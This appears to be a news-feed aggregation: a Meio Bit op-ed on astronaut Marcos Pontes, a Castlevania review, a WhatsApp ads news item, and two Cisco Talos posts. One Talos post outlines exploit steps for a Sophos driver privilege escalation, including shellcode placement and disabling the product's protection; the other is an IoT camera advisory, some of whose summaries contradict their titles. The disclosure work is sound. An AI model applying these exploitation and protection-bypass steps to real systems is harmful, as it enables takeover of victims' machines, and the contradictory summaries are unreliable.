We are taught that Science is hard, that science is for weird nerds who speak indecipherable languages and have no contact with reality. How is the public going to take an interest in Science if it learns from an early age that it is too hard for them?

Serious countries do everything they can to popularize Science, like Canada, which spent the equivalent of US$ 50 thousand to put astronaut Chris Hadfield on a 22-minute chat with children at a school on Earth.


NASA — Hadfield Chats with Hadfield School Students Back Home

Besides that, science is not just the LHC, and nobody is born knowing everything. Christa McAuliffe was going to perform basic experiments in orbit that would be repeated on the ground by students in schools all over the country. She would teach a class straight from the Space Shuttle to her students at Concord High School. Again: on paper it makes no sense, it is cheaper to teach from the ground, but how many hearts and minds would that have won over?

In 1971 NASA did a silly experiment to prove that Galileo was right. On paper, totally unnecessary: we already know that an object's weight does not affect the speed of its fall, the gravitational force is the same. Contrary to legend, Galileo did not discover this by dropping cannonballs from the Tower of Pisa, he used inclined planes, but NASA used... a feather.

During the Apollo XV mission astronaut David Scott did a live experiment on TV: holding a 1.3 kg hammer and a falcon feather, he let both fall from a height of 1.6 meters. According to Galileo, without air resistance both should fall at the same speed:


Nikolas Zane — Feather & Hammer Drop on Moon

That experiment has been done thousands of times on the ground, in vacuum chambers and far more cheaply, but which video do you think makes children say "WOW!"?

Beans in Space

All of this brings us to the most stupid criticism of the appointment of Marcos Pontes as Minister of Science and Technology: that he went to plant beans in space.

Curiously, nobody ridicules NASA/ESA for doing the same thing with the SEEDS IN SPACE program, whose basic purpose is education and science outreach. Seeds are sent to the International Space Station and the astronauts plant not beans (gringos don't like them) but lettuce, as in this picture of French astronaut Thomas Pesquet:

At the same time kits are sent to schools; the children plant the seeds and look after them, watering them and following along in sync with the astronauts in orbit, and the growth is compared. One such experiment in 2004 was replicated by 70 thousand children in schools in the Netherlands.

Nobody in the US or Europe accused the astronauts of being bean planters.

The experiment Marcos Pontes did on the ISS was not new; seeds were the first form of life to go to space, launched on a V2 by the US in 1946. He did not intend to discover anything new, nor was that his job. Marcos Pontes is not a scientist, and neither were Neil Armstrong or Yuri Gagarin. The first real scientist-astronaut was Harrison Schmitt, who flew on the last Apollo, XVII. Pontes and Armstrong are highly qualified professionals, trained to carry out scientific experiments, like every astronaut.

Inspiration, do I need to draw you a picture?

The Centenary Mission experiment did not aim to save the world; it was far more ambitious: to inspire wonder at discovery and scientific curiosity in children. Marcos Pontes planted and monitored the germination of bean seeds together with students from several municipal schools in São José dos Campos. But he did not plant only beans.

He also planted Gonçalo-Alves, an endangered tree you have never heard of, as part of an EMBRAPA experiment that sought to improve techniques for environmental preservation and sustainable development.

He did not plant only beans

Marcos Pontes did more experiments in 9 days and 21 hours in space than most of his critics have done in their entire lives. There were eight experiments, created by various institutions:

  1. Effect of microgravity on enzyme kinetics - Centro Universitário da FEI (Faculdade de Engenharia Industrial);
  2. DNA damage and repair in microgravity - UERJ (Universidade Estadual do Rio de Janeiro) and INPE (Instituto Nacional de Pesquisas Espaciais);
  3. Test of capillary evaporators in a microgravity environment - UFSC (Universidade Federal de Santa Catarina);
  4. Mini heat pipes - UFSC;
  5. Seed germination in microgravity - Embrapa (Empresa Brasileira de Pesquisa Agropecuária) and Cenargen (Embrapa Genetic Resources and Biotechnology unit);
  6. Protein interaction clouds - Cenpra (Centro de Pesquisas Renato Archer), of the Ministry of Science and Technology;
  7. Germination of bean seeds - São José dos Campos (SP) Department of Education;
  8. Chlorophyll chromatography - São José dos Campos (SP) Department of Education.

He did not go for a stroll, he was not a "tourist". Pontes fulfilled the hard role of trying to save face for a space program marked by incompetence and cross-party politicking (if Lula screwed Brazil over on the ISS, he learned it from FHC, who did the same).

Pontes was a pioneer, the first Brazilian in space. It was not his job to generate profit or bring new advanced manufacturing methods to national industry. His main job was to be a symbol, to show that at some point, if we lift our heads above the grass, we can do great things, and that, even stumbling along, a child born in Brazil CAN dream of exploring space.

Beyond that, the accusations that "he did no science" are ridiculous. The Beagle's pilot did no science either, but without him Darwin would have had to learn to swim. Pontes did do science, the most important part, experimentation; without experimentation science is just philosophy, that strange school of thought in which Aristotle said that men have more teeth than women and neither he nor his disciples bothered to count.

Here are some of the papers based on Pontes' experiments during his 9 days on the International Space Station:

All of this I found in less than 5 minutes of research. But it is more convenient to call him a bean planter.

Pontes was a failed attempt to inspire a people that hates its idols, that builds pedestals already planning to throw the guy off them. The media's attack on Pontes shows more than blind partisanship: a lack of vision, an inability to understand that sometimes inspiring is more important than doing. We are condemned to admire only people with a ball at their feet, a microphone in their hand or a webcam in their face.

Worse, this tendency toward obscurantism is worldwide. Christa McAuliffe died in the Challenger explosion, 73 seconds after liftoff. The Teacher in Space program was cancelled. Homer Hickam was insulted by millennials on Twitter, Trump cancelled the White House Science Fair (after promising to keep it) and Marcos Pontes is being insulted from all sides.

On Twitter people came to explain to me that an aeronautical engineer with a master's degree from abroad, an astronaut, cosmonaut, test pilot, with a bachelor's degree in Public Administration and a résumé like this, is not qualified enough to be Minister of Science and Technology.

The curious thing is that they say this résumé and "just a master's" are not enough to be Minister of Science and Technology, but nobody raised the issue when the minister was Aldo Rebelo, a journalist who proposed a law punishing technological innovation, a minister famous for having created the National Saci-Pererê Day and a global warming denier.

Honestly I have serious doubts that Pontes will manage to promote Science in a country that hates it, and I do not believe the Ornitomito's promise to give R$ 10 billion to the ministry. The president is deeply tied to the evangelical caucus, and that is never a good sign for Science.

Besides that, there are arguments that Pontes has no experience as a political operator. There is room for debate: for almost 10 years he was the intermediary between Brazil and NASA, and spent enough time behind the scenes of power to know how it works, but it is an acceptable argument at least.

What you cannot do is ignore the man's entire résumé and history and disqualify him in such a low, cheap way. If you think Marcos Pontes is a mere bean planter, go plant potatoes yourself!

Sources
  1. Get to know the eight Brazilian experiments taken to the ISS
  2. Made in Brazil: Brazil on the International Space Station
  3. Marcos Pontes - Résumé
  4. Wikipedia - Aldo Rebelo
  5. Trump Leaves Science Jobs Vacant, Troubling Critics
  6. Prefeitura Municipal de São José dos Campos
  7. Gazeta do Povo
  8. Dear Nobel Winners, Mr. Trump Has All the Brains He Needs

P.S.:

Before you start with "boo-hoo, he sells pillows", I ask: do you pay his bills? Well then, when the bills come due we do what we have to do. Besides, Buzz Aldrin walked on the Moon and then advertised Beetles; go complain to him.

The post "Sobre martelos, penas, professorinhas e plantadores de feijões" (On hammers, feathers, schoolteachers and bean planters) appeared first on Meio Bit.

Talos Vulnerability Deep Dive - TALOS-2018-0636 / CVE-2018-3971 Sophos HitmanPro.Alert vulnerability

Talos - Thu, 01/11/2018 - 13:00
Marcin Noga of Cisco Talos discovered this vulnerability.

Introduction
After disclosing two vulnerabilities in Sophos HitmanPro.Alert on Thursday, Cisco Talos will show you the process of developing an exploit for one of these bugs. We will take a deep dive into TALOS-2018-0636/CVE-2018-3971 to show you the exploitation process.

Sophos HitmanPro.Alert is a threat-protection solution based on heuristic algorithms that detect and block malicious activity. Some of these algorithms need kernel-level access to gather the appropriate information they need. The software's core functionality has been implemented in the `hmpalert.sys` kernel driver by Sophos. This blog will show how an attacker could leverage TALOS-2018-0636 to build a stable exploit to gain SYSTEM rights on the local machine.


Vulnerability Overview
During our research, we found two vulnerabilities in the `hmpalert.sys` driver's IO control handler. For the purposes of this post, we will focus only on TALOS-2018-0636/CVE-2018-3971, an escalation of privilege vulnerability in Sophos HitmanPro.Alert. First, we will turn it into a reliable write-what-where vulnerability and then later into a fully working exploit.

First, we use the `OSR Device Tree` tool (Figure 1) to analyse the `hmpalert.sys` driver's access rights.

Figure 1. Device Tree application showing hmpalert device privilege settings

We can see that any user logged into the system can obtain a handle to the `hmpalert` device and send an I/O request to it. Keep in mind for building this exploit that, as we mentioned in the original vulnerability blog post, the I/O handler related to this vulnerability is triggered by the IOCTL code `0x2222CC`. The vulnerable code looks similar to the one below.

Figure 2. Body of a vulnerable function
The nice thing is that we fully control the first three parameters of this function, but we do not control the source data completely (e.g. the `srcAddress` needs to point to some memory area related to the lsass.exe process) (line 12).

Additionally, data read from the lsass.exe process (line 23) is copied to the destination address the `dstAddress` parameter is pointing to (line 33).

With this basic information, we can construct the first proof of concept exploit to trigger the vulnerability:

Figure 3. Minimal proof of concept to trigger the vulnerability
This looks like it could work, but it's not enough to create a fully working exploit. We need to dig into the `inLsassRegions` function and see how exactly the `srcAddress` parameter is tested. We have to check if we will be able to predict this memory content and turn our limited `arbitrary write` access into a fully working `write-what-where` vulnerability.

Controlling the source
We need to dive into the `inLsassRegions` function to get more information about the `srcAddress` parameter:

Figure 4. The function responsible for checking if the `srcAddress` variable fits in one of the defined memory regions.

We can see that there is an iteration over the `memoryRegionsList` list elements, which are represented by the `memRegion` structure. The `memRegion` structure is quite simple: it contains a field pointing to the beginning of the region and a second field holding the size of the region. The `srcAddress` value needs to fit within the boundaries of one of the `memoryRegionsList` elements. If this is the case, the function returns 'true' and the data is copied.

The function will return 'true' even if only the `srcAddress` value fits between the boundaries (line 21). If the `srcSize` value is larger than the available region space, the `srcSize` variable is updated with the available size (line 26). The question is: what exactly do these memory regions represent? The `initMemoryRegionList` function will give us an idea.

Figure 5. Initialization of memory regions list.

We can see that the context of the current thread is switched to the `lsass.exe` process address space and then the `createLsaRegionList` function is called:

Figure 6. Various memory elements of the lsass.exe process are added to the memory regions list.

Now we can see that the memory regions list is filled with elements from the `lsass.exe` PEB structure. The ImageBase addresses of loaded and mapped DLLs are added to the list, together with their SizeOfImage (line 31), along with other information. Unfortunately, the `lsass.exe` process is running as a service. This means that with normal user access rights we won't be able to read its PEB structure, but we can leverage the knowledge about the mapped DLLs in the exploit in the following way: system DLLs like `ntdll.dll` are mapped into each process at the same address, so we can copy bytes from these system DLLs in the `lsass.exe` process memory region into the memory location pointed to by the `dstAddress` parameter. With that in mind, we can start creating our exploit.
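The two checks just described, modelled in user-mode C as an added example (this is not Talos's or Sophos's code; the boundary constant, the function names and the sample region are assumptions chosen for illustration): `in_lsass_regions` follows the Figure 4 semantics, accepting `srcAddress` if it lies inside a recorded region and clamping `srcSize` to the space left, while `is_user_range` is the destination validation the vulnerable handler lacks. It applies what `ProbeForWrite` enforces in a real driver: the whole `[dst, dst+size)` range must lie below the user/kernel boundary and must not wrap around. The `hardened` flag lets the model run both ways so the difference is visible.

```c
/*
 * Added example, not code from the deep dive or from the hmpalert.sys
 * driver: a user-mode model of the IOCTL handler's source check plus the
 * destination check it was missing.  Constants and names are assumptions.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* x64 Windows MmUserProbeAddress value (assumed for the model). */
#define USER_PROBE_ADDRESS 0x00007FFFFFFF0000ULL

typedef struct {
    uint64_t base;   /* start of the region (e.g. a DLL ImageBase) */
    uint64_t size;   /* length of the region (e.g. SizeOfImage)    */
} mem_region;

/* Mirrors Figure 4: true if src is inside some region; clamps *size. */
bool in_lsass_regions(const mem_region *regions, size_t count,
                      uint64_t src, uint64_t *size)
{
    for (size_t i = 0; i < count; i++) {
        uint64_t end = regions[i].base + regions[i].size;
        if (src >= regions[i].base && src < end) {
            uint64_t avail = end - src;        /* bytes left in region */
            if (*size > avail)
                *size = avail;                 /* line 26 in the figure */
            return true;                       /* only src is checked  */
        }
    }
    return false;
}

/* The check the vulnerable handler lacks: ProbeForWrite semantics. */
bool is_user_range(uint64_t dst, uint64_t size)
{
    if (size == 0)
        return true;                        /* zero-length is harmless */
    if (dst > UINT64_MAX - size)
        return false;                       /* range wraps around      */
    return dst + size <= USER_PROBE_ADDRESS;
}

typedef enum { COPY_OK, COPY_BAD_SRC, COPY_BAD_DST } copy_status;

/*
 * Model of the handler.  With hardened == false it behaves as the deep
 * dive describes (destination never validated).  With hardened == true
 * the destination is validated before any copy would take place.
 */
copy_status handle_copy_request(const mem_region *regions, size_t count,
                                uint64_t src, uint64_t dst, uint64_t size,
                                bool hardened, uint64_t *copied)
{
    uint64_t n = size;
    if (!in_lsass_regions(regions, count, src, &n))
        return COPY_BAD_SRC;
    if (hardened && !is_user_range(dst, n))
        return COPY_BAD_DST;
    *copied = n;          /* a real driver would memcpy n bytes here */
    return COPY_OK;
}

/* Constructed sample: one "DLL" region, as would come from the lsass PEB. */
static const mem_region sample_regions[] = {
    { 0x00007FF800000000ULL, 0x1000ULL },
};
#define SAMPLE_COUNT (sizeof sample_regions / sizeof sample_regions[0])

int main(void)
{
    uint64_t copied = 0;
    uint64_t kernel_dst = 0xFFFFF80000000000ULL;   /* a kernel address */
    uint64_t src = 0x00007FF800000FF0ULL;          /* 16 bytes before end */

    copy_status s = handle_copy_request(sample_regions, SAMPLE_COUNT,
                                        src, kernel_dst, 0x100, false, &copied);
    printf("unhardened: status %d, would copy %llu bytes to a kernel address\n",
           (int)s, (unsigned long long)copied);

    s = handle_copy_request(sample_regions, SAMPLE_COUNT,
                            src, kernel_dst, 0x100, true, &copied);
    printf("hardened:   status %d (destination rejected)\n", (int)s);
    return 0;
}
```

The unhardened path shows why the bug is a write primitive: a source inside an lsass region is enough for the copy to proceed, and the clamped length (16 bytes here) is written wherever `dst` points. The hardened path rejects any destination that reaches into kernel space or wraps, which is the check a driver must perform on every pointer it receives through an IOCTL from a user-mode caller.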

Exploitation
This is not a typical `write-what-where` vulnerability like the ones you see in common exploitation training classes, but nevertheless, we don't need to be too creative to exploit it. The presented exploitation process is based on the research presented by Morten Schenk during his presentation at the BlackHat USA 2017 conference. It also includes modifications from Mateusz "j00ru" Jurczyk, which he included in his paper "Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)." With a few changes, we can use j00ru's code, WCTF_2018_searchme_exploit.cpp, as a template for our exploit. These changes include:
  1. Removing entire codes related to pool feng-shui.
  2. Writing a class for memory operations using the found primitives in the hmpalert.sys driver.
  3. Updating the important exploit offsets based on the ntoskrnl.exe and the win32kbase.sys versions.
Then, we will be able to use the mentioned strategy from Morten and Mateusz:
  1. Leak addresses of certain kernel modules using the NtQuerySystemInformation API. We assume that our user operates at the `Medium IL` level.
  2. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of `nt!ExAllocatePoolWithTag`.
  3. Call `NtGdiDdDDIGetContextSchedulingPriority` (`= ExAllocatePoolWithTag`) with the `NonPagedPool` parameter to allocate writable/executable memory.
  4. Write the ring-0 shellcode to the allocated memory buffer.
  5. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of the shellcode.
  6. Call `NtGdiDdDDIGetContextSchedulingPriority` (`= shellcode`).
  7. The shellcode will escalate our privileges to SYSTEM access rights after copying a security TOKEN from the system process to our process.
Test environment
Tested on Windows: Build 17134.rs4_release.180410-1804 x64 Windows 10

Vulnerable product: Sophos HitmanPro.Alert 3.7.8 build 750

Memory operation primitives
To simplify memory operations, we wrote a class using the found memory operation primitives in the hmpalert.sys driver.

Figure 7. The memory class implementation
The core `copy_mem` method is implemented like this:

Figure 8. The Memory::copy_mem method implementation

We initialize a couple of important elements inside the class constructor:

Figure 9. The memory class constructor implementation
We can use the `write_mem` method to write a certain value to a specific address:

Figure 10. The memory class write_mem method implementation

We cannot directly copy bytes defined in the `data` argument. Therefore, we need to search for each byte from the `data` argument in the mapped `ntdll.dll` image and then pass the address of that byte to the hmpalert driver via the `srcAddress` parameter. That way, byte by byte, we overwrite the data at the destination address `dstAddress` with the bytes defined in the `data` argument. Using this class, we can easily overwrite the necessary kernel pointers and copy our shellcode to the allocated page:


Figure 11. Shellcode copy operation to an allocated page.
The rest of the exploit is straightforward, so we can leave the implementation as a task for the interested reader.

Fail — Zero-day protection really works!
Armed with a fully working exploit, we are ready to test it. If it works, we should get SYSTEM level privileges.

Figure 12. The elevated console is detected and terminated by HitmanPro.Alert.

It looks like our exploit has been detected by HitmanPro.Alert's anti-zero-day detection engine. Looking at the exploit log, it seems that its entire code was executed, but the spawned elevated console has been terminated.

Figure 13. At the end of the exploit, the console with elevated rights is executed.
We can see in the system event log that HitmanPro.Alert logged an exploitation attempt and classified it as a local privilege escalation:

Figure 13. Event log showing that it was logged by HitmanPro.Alert as an attempted privilege escalation.

Using a zero-day to bypass anti-zero-day detection
We know that our exploit works correctly, but the problem is that it's terminated by the anti-exploitation engine during an attempt to spawn the elevated shell.

We can look at HitmanPro.Alert's engine to find out where this function is implemented. The Microsoft Windows API provides `PsSetCreateProcessNotifyRoutine`, which can be used to monitor process creation in the OS. Searching for this API call in the `hmpalert.sys` driver, IDA shows a couple of calls.

Figure 14. Registration of `ProcessNotifyRoutine` via the `PsSetCreateProcessNotifyRoutine` API.

We do see some places where it registers the callback routine. Let's look into the implementation of the `ProcessNotifyRoutine`. While stepping through it, we found the following code:

Figure 15. An implementation of the `ProcessesKiller` function, responsible for the termination of potentially malicious processes.

At line 44, you can see a call to the routine that's responsible for killing "dangerous/malicious" processes. As we can see at line 5, there is a condition checking whether the global variable `dword_FFFFF807A4FA0FA4` is set. If it is not set, the rest of the function code will not be executed. All we need to do is overwrite the value of this global variable with zero to avoid termination of our elevated console. The final portion of the exploit looks like this:

Figure 16. Overwriting a global variable in the `hmpalert.sys` driver to trick the `ProcessesKiller` function, allowing our spawned elevated console to execute.
Time to test our exploit in action.

Final exploit - LPE Windows 10 x64 / SMEP bypass (video)


Summary
Due to the many anti-exploitation features in today's operating systems, weaponizing vulnerabilities can often be arduous, but this particular vulnerability shows that some Windows kernel-level flaws can still be used to easily exploit bugs in modern Windows systems. This deep dive showed how an attacker could take a vulnerability and weaponize it into a stable, usable exploit. Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis and provide additional deep-dive analysis when necessary. Check out our original disclosure here to find out how you can keep your system protected from this vulnerability.


Castlevania Requiem: Symphony of the Night and Rondo of Blood — Review

MeioBit - Thu, 01/11/2018 - 11:06

Few companies have a catalog as respectable as Konami's, and among the many classics it has released over the years, several belong to the Castlevania franchise. Knowing the enormous appeal the series still has, and wanting to take advantage of the launch of the second season of the Netflix-produced show, the Japanese company decided to exploit two era-defining titles, and so Castlevania Requiem: Symphony of the Night and Rondo of Blood arrived on the PlayStation 4.

The stories of the two games are directly connected: in Rondo of Blood we follow Richter Belmont on an adventure to rescue his beloved Annette from the clutches of Count Dracula, while in Symphony of the Night we take on the role of Alucard, the vampire's son, whose goal is also to destroy him.

Of the two, Symphony of the Night is without doubt the better known, not least because its predecessor originally appeared only on the PC Engine, the Japanese version of the console known over here as the TurboGrafx-16. Even though the game was later remade for the Super Nintendo and appeared as Castlevania: Dracula X, there were many differences between the versions, such as the art direction, the lack of cutscenes and even the layout of the stages.

In the case of Rondo of Blood, what may scare younger players, or those who have not played a more traditional Castlevania in a long time, is its high difficulty level. With enemies dealing a lot of damage and no abundance of items to restore our health, dying will be a constant, and as it follows the more linear style of the older games in the series, be prepared to redo the same stretch several times.

Symphony of the Night, on the other hand, is a marvel when it comes to gameplay. By adopting exploration and RPG elements, the title managed to become a watershed for the franchise, being challenging in a different way and proving extremely addictive. Trying to uncover every secret of Dracula's castle remains a lot of fun, especially if we want to see its inverted version and find everything the game has to offer.

A faithful but lazy port

Based on Castlevania: The Dracula X Chronicles, which was released for the PSP in 2007, Konami's choice resulted in more weak points than strong ones. To begin with, Symphony of the Night comes with a localization quite different from the one in the original released for the PlayStation, or even in the version that appeared on the Xbox 360 that same year. This means more professional voice acting, but also some changes to the script. Remember the famous dialogue right at the start in which Dracula says "What is a man? A miserable little pile of secrets"? Well, it is not here.

In addition, this PlayStation 4 collection unfortunately does not include the 2.5D remake of Rondo of Blood, and although I prefer the original graphics, it would have been nice to have that version, even if it had to be unlocked after completing a few steps.

That does not mean, however, that the games come with no new features, but it must be admitted that they are very small. One example is sound output through the controller when we pick up items, or the gamepad vibrating according to what is happening on screen. Such features help improve the experience, but they cannot be called major differentiators.

Konami also made sure that both games run at resolutions of up to 4K, but we are talking about pixel graphics, and personally I could not see a difference between Symphony of the Night running on the PlayStation 4 and on the Xbox 360. Add to that the option to choose the screen border, to add filters that imitate a CRT TV or make the pixels "prettier", and in the end the real highlight is the option to play with English or Japanese voices, as well as the trophies.

Where is the museum, Konami?

What I really missed in Castlevania Requiem: Symphony of the Night and Rondo of Blood, however, was a museum mode. Unlike what Capcom has been doing in its collections, Konami did not bother to include some information for fans, such as a concept art gallery, information about the productions, interviews with the developers or even a place to listen to the games' music, which, in the case of soundtracks of such quality, is almost a crime.

As a big fan of the franchise, it would have been great to learn details about how these two excellent games were made, to revisit commercials or to see some of the professionals involved in their creation talking about the difficulties and choices that were made. I know many people do not care about this kind of extra material, but I believe it would show that more care went into developing the package; apparently that is not how the people at Konami think.

Over-reliance on nostalgia

Even though there is no doubt that Konami could have put more effort into creating Castlevania Requiem: Symphony of the Night and Rondo of Blood, the games this collection brings are so spectacular that they overshadow any problem it has. Perhaps the company leaned precisely on that, and on the fans' passion, to save on production, which can in no way be celebrated, but the truth is that both Symphony of the Night and Rondo of Blood are so good, and have aged so well, that it is hard not to recommend the package.

The hope now is that the brand's owner develops a taste for this and re-releases several other Castlevania games, especially those that remained exclusive to handhelds. However, it would be good if the company made a bit more of an effort and gave us something beyond "just" good ports, because the fans' nostalgia certainly deserves much more.

Meio Bit reviewed Castlevania Requiem: Symphony of the Night and Rondo of Blood on the PlayStation 4, with a digital copy provided by Konami.

The post Castlevania Requiem: Symphony of the Night and Rondo of Blood — Review appeared first on Meio Bit.

WhatsApp confirms the introduction of ads in the Status tab

MeioBit - Thu, 01/11/2018 - 10:30

WhatsApp is finally going to make some money off its users: according to vice president Chris Daniels, the instant messenger will soon start displaying ads, interspersed among your contacts' posts in the Status tab. The feature, however, does not yet have a launch date.

The way WhatsApp chose to deliver the advertisements could not have been any other, really: just as already happens on Instagram and Facebook, Status is the app's version of Stories, the photo and video posts that survive for only 24 hours, which Mark Zuckerberg's company copied from Snapchat after failing to buy the rival firm. Today WhatsApp Status has 450 million daily users, so monetizing it was inevitable.

Before Facebook bought WhatsApp in 2014, the startup boasted that it never showed ads to its users and, to keep its services running, charged a "symbolic fee" of just US$ 1 a year, even though the overwhelming majority of users never paid a cent.

When Zuck paid US$ 19 billion to buy WhatsApp, the fee was dropped and one of the promises made at the time was to keep the app ad-free, but without a source of revenue that did not last: founders Jan Koum and Brian Acton resisted for years the introduction of ads on the platform and the sharing of its data with the company's other products, but with the adoption of the Status tab and the consequent imposition of Facebook's vision, both were outvoted and left the company. Today Acton calls himself "a sellout" for having betrayed users' trust, which even led him to give up US$ 850 million in stock by jumping ship.

According to Daniels, the changes to be made to include ads will not harm the privacy of WhatsApp users, as end-to-end encryption will not be affected; Facebook thus remains unable to analyze the content of shared messages, and will have to rely on other methods to learn what its consumers share within the platform.

The executive did not clarify when WhatsApp will start showing ads, but it should not take long: references to the feature have already been found in the code of Android beta versions, indicating that the advertisements should be enabled in an upcoming update.

Source: The Economic Times.

The post "WhatsApp confirma a introdução de anúncios na aba Status" (WhatsApp confirms the introduction of ads in the Status tab) appeared first on Meio Bit.

Vulnerability Spotlight: Multiple Vulnerabilities in Yi Technology Home Camera

Talos - Wed, 31/10/2018 - 18:18
Vulnerabilities Discovered by Lilith [x_x] of Cisco Talos.

Overview

Cisco Talos is disclosing multiple vulnerabilities in the firmware of the Yi Technology Home Camera. In order to prevent the exploitation of these vulnerabilities, Talos worked with Yi Technology to make sure a newer version of the firmware is available to users. These vulnerabilities could allow an attacker to gain remote code execution on the devices via a command injection, bypass methods of network authentication, or disable the device.

The Yi Home Camera is an internet-of-things (IoT) home camera sold globally. The 27US version is one of the newer models sold in the U.S. and is the most basic model out of the Yi Technology camera lineup.

It includes all the functions that one would expect from an IoT device, including the ability to view the camera's feed from anywhere, offline storage, subscription-based cloud storage and easy setup.

There are many consequences to a security vulnerability within the firmware of this security camera. An attacker could exploit these vulnerabilities to:

  • Disable the camera to prevent it from recording.
  • Delete stored videos on the camera.
  • View video feeds from the camera.
  • Potentially launch attacks against the camera owner's phone app.
  • Act as a foothold into the home network to attack other devices inside.


This list is not complete, and many other consequences could occur, so Talos highly recommends that the devices are patched as soon as possible via the Yi Home application.

Exploitation

Due to the nature of IoT devices, more attack surfaces are available on a given device than on a typical server or client program. For half of the vulnerabilities, physical access is required to exploit them, which obviously makes them less of a concern if the camera is stored safely inside the venue it is protecting, but for the other five vulnerabilities there is a network attack vector, raising their severity and the importance of getting the latest firmware.

Before summarizing these network-based vulnerabilities, it is important to note that they are all made possible by TALOS-2018-0616, as all of these vulnerabilities are over cleartext protocols, either unencrypted UDP or HTTP. If the slight performance hit had been taken to implement the core network functionality over HTTPS, these vulnerabilities would either not have been as severe, or not have been exploitable at all.

Denial of service:

TALOS-2018-0602 and TALOS-2018-0595 were both found within the p2p_tnp binary, which is the main controller for phone-to-camera and cloud-to-camera communication. That binary also implements a custom UDP peer-to-peer (p2p) protocol for all of the aforementioned features. In both vulnerabilities, some opcodes that appear to be leftover artifacts could be accessed without authentication, which would allow an attacker to either permanently disable the video feed or cause unlimited memory to be allocated, both rendering the camera useless.

Remote Code Execution:

TALOS-2018-0567 is easily the most severe vulnerability out of the batch, requiring only the ability to respond to an HTTP request from the camera in order to hit a command injection and subsequent code execution. The vulnerable time_sync request happens extremely often as soon as the device connects to the network.

Administrative Access:

The last of the network-based vulnerabilities, TALOS-2018-0601, allows an attacker to reuse tokens that can be sniffed over the wire via TALOS-2018-0616, so that one sniffed token can be used an unlimited number of times to access the p2p_tnp API that is normally reserved for the camera's owner via the Yi Home phone application. This access only lasts until the device reboots, at which point another token needs to be sniffed.

Physical and Local Attack Vectors:

As noted above, IoT devices tend to lend themselves to vulnerabilities with more unusual attack vectors, and the Yi Home Camera is no exception. Vulnerabilities were found via the firmware update functionality (TALOS-2018-0565, TALOS-2018-0584 and TALOS-2018-0566), the SSID that the camera connects to for wireless access (TALOS-2018-0580) and via the QR code that is used when setting up the device out of the box (TALOS-2018-0572 and TALOS-2018-0571). Because of this, it is suggested that these devices are not kept in areas where they are physically available to others, and once again, that the devices' firmware is updated as soon as possible.

Vulnerability Summaries

TALOS-2018-0565 - Yi Technology Home Camera 27US Firmware Update Code Execution Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0566 / CVE-2018-3891 - Yi Technology Home Camera 27US Firmware Downgrade Vulnerability

An exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0567 - Yi Technology Home Camera 27US TimeSync Code Execution Vulnerability

An exploitable firmware downgrade vulnerability exists in the time syncing functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.

TALOS-2018-0571 / CVE-2018-3898, CVE-2018-3899 - Yi Technology Home Camera 27US QR Code trans_info Code Execution Vulnerability

An exploitable code execution vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0572 / CVE-2018-3900 - Yi Technology Home Camera 27US QR Code Base64 Code Execution Vulnerability

An exploitable firmware downgrade vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0580 / CVE-2018-3910 - Yi Technology Home Camera 27US cloudAPI SSID Code Execution Vulnerability

An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.

TALOS-2018-0595 / CVE-2018-3928 - Yi Technology Home Camera 27US Notice_To Denial Of Service Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause the settings to change, resulting in a denial of service. An attacker can send a set of packets to trigger this vulnerability.

TALOS-2018-0601 / CVE-2018-3934 - Yi Technology Home Camera 27US Nonce Reuse Authentication Bypass Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.

TALOS-2018-0616 / CVE-2018-3947 - Yi Technology Home Camera 27US p2p_tnp Cleartext Data Transmission Vulnerability

An exploitable information disclosure vulnerability exists in the phone-to-camera communications of Yi Home Camera 27US 1.8.7.0D. An attacker can sniff network traffic and trigger this vulnerability.

TALOS-2018-0602 / CVE-2018-3935 - Yi Technology Home Camera 27US CRCDec Denial Of Service Vulnerability

An exploitable code execution vulnerability exists in the UDP network functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can allocate unlimited memory, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability.

Versions Tested

The Yi Technology Home Camera 27US 1.8.7.0D version of the firmware was used during the discovery of the vulnerabilities listed above.

Firmware at Yi Technology

Conclusion

With the increased convenience of IoT devices, a new set of attack vectors arose that have not been as hardened as traditional ones. As such, Talos recommends that users apply these newly available firmware updates in order to ensure their continued and secure operation. This can be done via the Yi Home phone app, which will notify the user of this new firmware upon being opened. It is also recommended that the user checks the device's firmware version after the update, via the phone app, in order to ensure that the update did in fact occur.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules:
46190-46191, 46294-46295, 46780, 46870.

For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

